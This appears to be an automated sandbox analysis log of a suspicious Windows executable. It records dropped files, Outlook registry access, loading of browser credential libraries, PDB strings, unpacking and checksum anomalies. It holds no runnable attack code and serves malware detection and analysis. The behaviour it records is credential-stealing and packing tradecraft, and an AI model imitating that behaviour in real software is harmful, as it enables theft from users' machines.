Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe	Section loaded: apphelp.dll

Source: C:\Users\user\Desktop\VucRf0jboS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\VucRf0jboS.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: VucRf0jboS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: VucRf0jboS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: VucRf0jboS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: VucRf0jboS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: VucRf0jboS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: VucRf0jboS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: VucRf0jboS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: u5qk.0.exe, 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021792267.0000020EEAA70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: FC:\velup.pdb source: VucRf0jboS.exe, 00000000.00000002.2368707088.000000000421E000.00000004.00000020.00020000.00000000.sdmp, VucRf0jboS.exe, 00000000.00000000.1700705502.0000000000413000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024422327.0000020EEB3A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000003.00000002.1994925905.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995197239.0000000004779000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995035449.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324295539.000000000468E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2325072403.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2329148115.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2330673814.0000000004313000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2327093725.0000000003B05000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524471270.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524115301.000000000488D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: mozglue.pdb source: u5qk.0.exe, 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000003.00000002.1992656537.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000000.1907137804.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000002.2294114402.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000000.2231681830.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044464664.0000020EEBE00000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021461752.0000020EEAA30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000003.00000002.1995525658.000000006C9F7000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000E.00000002.2357108993.000000006C417000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021663380.0000020EEAA60000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\velup.pdb source: VucRf0jboS.exe, 00000000.00000002.2368707088.000000000421E000.00000004.00000020.00020000.00000000.sdmp, VucRf0jboS.exe, 00000000.00000000.1700705502.0000000000413000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021509972.0000020EEAA40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021555558.0000020EEAA50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021509972.0000020EEAA40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021555558.0000020EEAA50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\keyoy_nutanikitibaha.pdb source: VucRf0jboS.exe, 00000000.00000003.1758649321.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000000.1756183454.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000003.00000002.1994925905.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995197239.0000000004779000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995035449.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324295539.000000000468E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2325072403.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2329148115.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2330673814.0000000004313000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2327093725.0000000003B05000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524471270.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524115301.000000000488D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044688870.0000020EEC0A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9001C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: nss3.pdb source: u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp

Source: VucRf0jboS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: VucRf0jboS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: VucRf0jboS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: VucRf0jboS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: VucRf0jboS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Unpacked PE file: 1.2.u5qk.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\VucRf0jboS.exe	Unpacked PE file: 0.2.VucRf0jboS.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Unpacked PE file: 1.2.u5qk.0.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Code function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00416240

Source: relay.dll.0.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: ssfwvk.6.dr	Static PE information: real checksum: 0x0 should be: 0xc411c
Source: tiktok[1].exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: FBAKEHIEBK.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: relay.dll.3.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: nkho.15.dr	Static PE information: real checksum: 0x0 should be: 0xc411c
Source: VucRf0jboS.exe	Static PE information: real checksum: 0x7b450 should be: 0x7b453

Source: u5qk.3.exe.0.dr	Static PE information: section name: .didata
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: nss3.dll.1.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0042786C push ecx; ret	0_2_0042787C
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0042780C push eax; ret	0_2_0042782A
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0042E3A5 push esi; ret	0_2_0042E3AE
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_00409D06 push ecx; ret	0_2_00409D19
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_004097B6 push ecx; ret	0_2_004097C9
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_04149F6D push ecx; ret	0_2_04149F80
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0415C9FD push esp; retf	0_2_0415C9FE
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_04149A1D push ecx; ret	0_2_04149A30
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_04167A73 push eax; ret	0_2_04167A91
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_04161B72 push dword ptr [esp+ecx-75h]; iretd	0_2_04161B76
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0415C3FF push esp; retf	0_2_0415C407
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_041E74D3 pushad ; retf	0_2_041E74D4
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_041E8568 push ecx; iretd	0_2_041E856E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_041E9D81 pushad ; retf	0_2_041E9D88
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_041EB7F3 push ebp; iretd	0_2_041EB826
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_041E9A6B push 2B991403h; ret	0_2_041E9A72
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_041EA391 push 00000061h; retf	0_2_041EA399
